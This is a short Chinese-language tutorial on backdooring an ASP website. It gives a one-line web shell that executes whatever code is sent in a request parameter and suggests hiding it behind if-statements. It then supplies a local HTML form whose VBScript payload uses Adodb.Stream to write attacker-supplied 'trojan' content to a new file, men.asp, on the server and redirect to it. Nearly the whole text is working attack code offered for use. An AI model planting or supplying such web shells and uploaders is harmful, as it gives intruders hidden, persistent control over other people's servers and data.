首先在asp文件中写如%execute request("value")%>代码
如果想要隐藏,就要加入一些if判断语句,即可
然后在本地写个表单
复制代码 代码如下:
form action=http://***.com/jb51.asp method=post>
textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("hackbin")
lP.SaveToFile server.mappath("men.asp"),2
lP.Close
set lP=nothing
response.redirect "men.asp"
/textarea>
textarea name=hackbin cols=120 rows=10 width=45>添入生成木马的内容/textarea>BR>center>br> input type=submit value=提交>
保存为htm文件,把http://***.com/jb51.asp替换成你插入%execute request("value")%>的文件,然后点提交直接跳转到木马